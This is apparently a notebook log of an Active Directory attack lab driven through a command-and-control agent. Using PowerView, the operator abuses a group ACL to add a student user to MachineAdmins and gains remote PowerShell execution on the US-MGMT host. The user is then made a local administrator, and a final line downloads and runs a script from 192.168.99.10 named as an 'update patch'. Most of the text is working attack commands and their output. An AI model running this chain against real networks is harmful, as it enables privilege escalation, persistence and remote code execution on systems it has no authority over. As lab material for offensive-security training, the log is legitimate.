CN=MaintenanceUsers,CN=Users,DC=us,DC=techcorp,DC=local
CN=StudentUsers,CN=Users,DC=us,DC=techcorp,DC=local
CN=Domain Users,CN=Users,DC=us,DC=techcorp,DC=local
CN=Managers,CN=Users,DC=us,DC=techcorp,DC=local



In [106]:
# Find Interesting ACLs for the groups
executePS("(Find-InterestingDomainAcl | ?{$_.IdentityReferenceName -like 'managers'})")

-- Command Sent --
Grunt Task ID:109
Powershell (Find-InterestingDomainAcl | ?{$_.IdentityReferenceName -like 'managers'})



Task has not completed...2a32602275 tasked
taskParam


In [108]:
executePS("(Get-DomainObjectAcl -Identity machineadmins | ?{$_.SecurityIdentifier -eq 'S-1-5-21-210670787-2521448726-163245708-1117'})")

-- Command Sent --
Grunt Task ID:111
Powershell (Get-DomainObjectAcl -Identity machineadmins | ?{$_.SecurityIdentifier -eq 'S-1-5-21-210670787-2521448726-163245708-1117'})





ObjectDN               : CN=MachineAdmins,OU=Mgmt,DC=us,DC=techcorp,DC=local
ObjectSID              : S-1-5-21-210670787-2521448726-163245708-1118
ActiveDirectoryRights  : ReadProperty, WriteProperty
ObjectAceFlags         : ObjectAceTypePresent, InheritedObjectAceTypePresent
ObjectAceType          : bf9679c0-0de6-11d0-a285-00aa003049e2
InheritedObjectAceType : bf967a9c-0de6-11d0-a285-00aa003049e2
BinaryLength           : 72
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 48
SecurityIdentifier     : S-1-5-21-210670787-2521448726-163245708-1117
AceType                : AccessAllowedObject
AceFlags               : ContainerInherit, Inherited
IsInherited            : True
InheritanceFlags       : ContainerInherit
PropagationFlags       : None

In [109]:
executePS("(Get-DomainGroup -Identity machineadmins -Properties *)")

-- Command Sent --
Grunt Task ID:112
Powershell (Get-DomainGroup -Identity machineadmins -Properties *)





grouptype             : GLOBAL_SCOPE, SECURITY
displayname           : MachineAdmins
samaccounttype        : GROUP_OBJECT
samaccountname        : machineadmins
whenchanged           : 7/5/2021 4:21:10 PM
objectsid             : S-1-5-21-210670787-2521448726-163245708-1118
objectclass           : {top, group}
cn                    : MachineAdmins
usnchanged            : 1946721
dscorepropagationdata : {7/30/2019 12:35:19 PM, 7/10/2019 4:00:03 PM, 7/10/2019 4:00:03 PM, 7/8/2019 10:18:09 AM...}
name                  : MachineAdmins
description           : Group to manage machines of the Mgmt OU
distinguishedname     : CN=MachineAdmins,OU=Mgmt,DC=us,DC=techcorp,DC=local
member                : CN=studentuser43,CN=Users,DC=us,DC=techcorp,DC=local
usncreated            : 38203
whencreated           : 7/7/2019 7:10:31 AM
instancetype          : 4
objectguid            : a02c806e-f233-4

In [6]:
# This command was problematic to run with system privileges.  Run as local admin worked...
# Add user to machineadmins...  Machine Admins can manage computers in MgmtOU
executePS("(Add-DomainGroupMember -Identity MachineAdmins -Members studentuser39 -Verbose)")
# After the user is added to the group for the new ACL to take affect you need to log off and back on

-- Command Sent --
Grunt Task ID:133
Powershell (Add-DomainGroupMember -Identity MachineAdmins -Members studentuser39 -Verbose)



[Add-DomainGroupMember] Adding member 'studentuser39' to group 'MachineAdmins'



In [120]:
# Identify the computers in the Mgmt OU that can now be managed by the studentuser39
executePS("((Get-DomainOU -Identity Mgmt).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name)")

-- Command Sent --
Grunt Task ID:127
Powershell ((Get-DomainOU -Identity Mgmt).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name)




name   
----   
US-MGMT





In [12]:
# Use powershell remoting and see if we have command execution on us-mgmt
# After studentuser39 is added to MachineAdmins make sure you logout and back on...
executePSRemote("us-mgmt", "whoami")
# With PSRemoting it would indicate administrative level access on that machine...

-- Command Sent --
Grunt Task ID:137
PowerShellRemotingCommand us-mgmt "whoami"



us\studentuser39



In [13]:
executePSRemote("us-mgmt", "ipconfig")

-- Command Sent --
Grunt Task ID:138
PowerShellRemotingCommand us-mgmt "ipconfig"




Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::d472:faab:3926:c027%6
   IPv4 Address. . . . . . . . . . . : 192.168.1.31
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.254



In [15]:
executePSRemote("us-mgmt", "net localgroup administrators us\\studentuser39 /add")

-- Command Sent --
Grunt Task ID:141
PowerShellRemotingCommand us-mgmt "net localgroup administrators studentuser39 /add"



The command completed successfully.




In [18]:
executePSRemote("us-mgmt", "net localgroup administrators")

-- Command Sent --
Grunt Task ID:150
PowerShellRemotingCommand us-mgmt "net localgroup administrators"



Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
US\Domain Admins
US\machineadmins
US\mgmtadmin
US\studentuser39
The command completed successfully.




In [17]:
executePSRemote("us-mgmt", "(iex (New-Object Net.WebClient).DownloadString('http://192.168.99.10/remoteupdatepatch.ps1'))")

-- Command Sent --
Grunt Task ID:143
PowerShellRemotingCommand us-mgmt "(iex (New-Object Net.WebClient).DownloadString('http://192.168.99.10/remoteupdatepatch.ps1'))"



Task has not completed...b5e0e475ed tasked
taskParam
